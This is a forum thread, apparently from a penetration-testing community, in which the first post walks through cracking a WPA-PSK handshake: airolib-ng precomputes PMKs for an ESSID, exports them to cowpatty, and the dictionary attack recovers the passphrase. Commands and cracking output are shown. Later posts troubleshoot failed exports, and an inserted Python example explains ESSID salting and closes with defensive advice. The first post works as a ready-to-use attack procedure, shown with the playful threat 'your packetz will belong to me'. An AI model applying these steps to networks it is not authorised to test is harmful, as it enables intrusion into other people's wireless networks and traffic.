
Thread: Airolib-ng and cowpatty

  1. #1
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default Airolib-ng and cowpatty

    It's not really a tut, but some hints to help those who want to speed things up when attacking WPA.

    I assume you have a WPA handshake capture in cap format (airodump + deauth).

    We are working on a network with ESSID test.

    I assume you already have airolib-ng (1.0 dev), have initiated a database, given it a large password file (mine is 172000+ passwords), and have precomputed it if you have added some ESSIDs.

    The trick is to add the ESSID to the db, precompute the keys with airolib-ng, and export the PMKs for this ESSID.

    airolib-ng DB2 stats (where DB2 is my database)
    statsThere are 2 ESSIDs and 172747 passwords in the database. 345494 out of 345494 possible combinations have been computed (100%).

    ESSID Priority Done
    Livebox-a5a3 64 100.0
    test 64 100.0

    Hopefully I already have "test" as an ESSID in my db; if not, I add it to the db and recompute the table: 172000 passwords = 172000 PMKs to generate for an ESSID (approx. 30 min).

    I now export it in cowpatty (genpmk) format
    (where DB2 is the database, "test" the ESSID to export, testpmk the PMK output file):
    airolib-ng DB2 export cowpatty "test" testpmk
    exportExporting...
    Done.

    Now we test the PMK against the ESSID.
    testpmk is the exported file from airolib-ng, "test" the ESSID, -v verbose, -r ...wpa.cap the handshake capture:
    cowpatty -d testpmk -s "test" -v -r /pentest/wireless/aircrack-ng/test/wpa.cap
    cowpatty 4.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>

    Collected all necessary data to mount crack against WPA/PSK passphrase.
    Starting dictionary attack. Please be patient.
    key no. 10000: arrojadite
    key no. 20000: calligraphical
    key no. 30000: contestation
    key no. 40000: dislocatory
    key no. 50000: femineity
    key no. 60000: hemadromometer
    key no. 70000: interlimitation
    key no. 80000: marquisotte
    key no. 90000: nonannulment
    key no. 100000: pancreatotomy
    key no. 110000: pontificality
    key no. 120000: raspingly
    key no. 130000: semiflashproof
    key no. 140000: subdecuple
    key no. 150000: trancedly
    key no. 160000: unimportance
    key no. 170000: weightlessness

    The PSK is "biscotte".

    172747 passphrases tested in 2.71 seconds: 63642.26 passphrases/second

    Yep, you've done it....
    I like the conjunction of cowpatty + SQL database of precomputed keys....really nice.....just need time (less and less....) and a HUGE password file....

    Just a little example of what can be done with these nice tools.....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006
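
Why the table has to be recomputed for every ESSID, as an added example that is not part of the original post: the WPA-PSK PMK is PBKDF2-HMAC-SHA1 of the passphrase with the ESSID as salt, so a table precomputed for "test" covers no network with a different name. The word list and the second ESSID are constructed; the rate in `full_table_seconds` is the 46 PMK/s figure quoted in post #2.

```python
import hashlib

def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1,
    salt = ESSID, 4096 iterations, 32-byte output."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               essid.encode("ascii"), 4096, 32)

def build_table(essid, words):
    """Precompute PMK -> passphrase for ONE ESSID; words of invalid length are skipped."""
    table = {}
    for word in words:
        try:
            table[wpa_pmk(word, essid)] = word
        except ValueError:
            continue
    return table

def covered(table, essid, passphrase):
    """True if the PMK of this (ESSID, passphrase) pair is present in the table."""
    return wpa_pmk(passphrase, essid) in table

def full_table_seconds(n_passwords, pmk_per_second):
    """Cost of precomputing one ESSID's table at a given rate."""
    return n_passwords / pmk_per_second

# Constructed sample word list; "short" is below the 8-character minimum.
WORDS = ["biscotte", "password", "short", "weightlessness"]
TABLE = build_table("test", WORDS)

if __name__ == "__main__":
    # Same passphrase, same table: only the ESSID the table was built for matches.
    for essid in ("test", "test-7f3a"):          # second ESSID is constructed
        print(essid, covered(TABLE, essid, "biscotte"))
    # A passphrase outside the word list is never covered, whatever the ESSID.
    print(covered(TABLE, "test", "correct horse battery staple"))
    # Post #2's numbers: 472992 passwords at 46 PMK/s, for a single ESSID.
    print(round(full_table_seconds(472992, 46) / 3600, 1), "hours")
```

A non-default, unique ESSID forces the whole precomputation to be repeated for that one network, and a passphrase that is in no word list is not in any table.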

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    You must have a fast processor Shaman...cause I got almost 500,000 passwords and this is my output after 18 minutes!!!>>>

    {-=Xploitz=-} ~ # airolib-ng testdb batch
    Computed 50000 PMK in 1067 seconds (46 PMK/s, 200000 in buffer).



    And in another tab.....


    {-=Xploitz=-} ~ # airolib-ng testdb stats
    statsThere are 1 ESSIDs and 472992 passwords in the database. 50000 out of 472992 possible combinations have been computed (10.571%).

    ESSID Priority Done
    Xploitz Network 64 10.57

    only 10%!!!!
    --=Xploitz=-- ®
    Remote-Exploit.orgs Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial" (http://forums.remote-exploit.org/showthread.php?t=9063)
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial" (http://forums.remote-exploit.org/showthread.php?t=7872)
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial" (http://forums.remote-exploit.org/showthread.php?t=8230)
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases" (http://forums.remote-exploit.org/showthread.php?t=8041)

  3. #3
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    Well, you do need to precompute the whole table.

    When you precompute it you can gain 3x on verifying the PMK.... but you need to have your table precomputed......

    Don't you remember prez's thread on time-memory....
    It was with a TL50 Core 2 Duo.... (not a fast one....)

    2 GB of RAM (maybe that helps)

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Yea..I'm having some MAJOR issues with that thread, balding_parrot, and Funnyman as well. Take a look...we need major help with cowpatty.


    Code:
    http://forums.remote-exploit.org/showthread.php?p=36325#post36325

  5. #5
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    So many problems with this as well...geesh. What steps did you take to make the databases? Cause I went to the aircrack-ng main site..and TRIED to follow their tutorial..but after I run the

    airolib-ng testdb batch
    Computed 4292 PMK in 102 seconds (42 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...

    I ^C to exit..and try your

    airolib-ng testdb stats
    statsThere are 2 ESSIDs and 2146 passwords in the database. 4292 out of 4292 possible combinations have been computed (100%).

    ESSID Priority Done
    64 100.0
    Xploitz 64 100.0

    Cool so far right??

    Now I do your airolib-ng testdb export cowpatty "Xploitz" testpmk

    exportThere is no such ESSID in the database or there are no PMKs for it.


    What gives???

  6. #6
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Here's a complete list of EVERYTHING I did in order.....


    {-=Xploitz=-} ~ # airolib-ng testdb init

    Now I make a ssidlist.txt and put ONLY Xploitz inside it and save

    {-=Xploitz=-} ~ # airolib-ng testdb import ascii essid ssidlist.txt
    importReading...
    Writing...
    Done.
    {-=Xploitz=-} ~ # airolib-ng testdb import ascii passwd algae.txt
    importReading...
    Writing... read, 411 invalid lines ignored.
    Done.
    {-=Xploitz=-} ~ # airolib-ng testdb batch
    Computed 4292 PMK in 75 seconds (57 PMK/s, 0 in buffer). No free ESSID found. Will try determining new ESSID in 5 minutes...

    {-=Xploitz=-} ~ # airolib-ng testdb stats
    statsThere are 2 ESSIDs and 2146 passwords in the database. 4292 out of 4292 possible combinations have been computed (100%).

    Where in the hell is this 2nd ESSID?? I only have 1 in it, and it's called Xploitz

    ESSID Priority Done
    64 100.0
    Xploitz 64 100.0

    {-=Xploitz=-} ~ # airolib-ng testdb export cowpatty "Xploitz" testpmk
    exportThere is no such ESSID in the database or there are no PMKs for it.

    So I tried it without the quotes......

    {-=Xploitz=-} ~ # airolib-ng testdb export cowpatty Xploitz testpmk
    exportThere is no such ESSID in the database or there are no PMKs for it.
    {-=Xploitz=-} ~ # WHAT GIVES????

  7. #7
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    I don't know about you, but it seems to me like there is some step missing, something that is assumed that we have previously done before even getting to these steps.
    I just cannot find what it is YET

  8. #8
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by balding_parrot View Post
    I don't know about you, but it seems to me like there is some step missing, something that is assumed that we have previously done before even getting to these steps.
    I just cannot find what it is YET
    Geesh..you too, balding_parrot?? First "Benefits of Time-Memory Trade-Off in coWPAtty", by theprez98, gives us problems...now airolib-ng is jacking us around!!! Geesh..doesn't anything work with this time management stuff?? C'mon Shaman, or anyone...please tell us what we're missing.

  9. #9
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Quote Originally Posted by -=Xploitz=- View Post
    Geesh..you too, balding_parrot?? First "Benefits of Time-Memory Trade-Off in coWPAtty", by theprez98, gives us problems...now airolib-ng is jacking us around!!! Geesh..doesn't anything work with this time management stuff?? C'mon Shaman, or anyone...please tell us what we're missing.
    There must be a connection somewhere, something so obvious.......

    Not sure about it saving time..... It is certainly using up enough.....

    Just think when we do get it working, with the amount of time we have spent on it, it's going to tell us the key before we even ask for it

  10. #10
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    C'mon Shaman...what are all the steps you took from beginning to end? This damn airolib is driving me crazy!! I asked on the aircrack forums..and darkAudix said he was doing EXACTLY the same thing as me with the same dev or aircrack..and he got it to work..but mine won't!! So my other question for you Niko is...

    Could it be that balding_parrot's sqlite module is at fault? Aircrack main site says you must be running version 3.3.17 or above..and parrot's is 3.4..please help us Shaman.
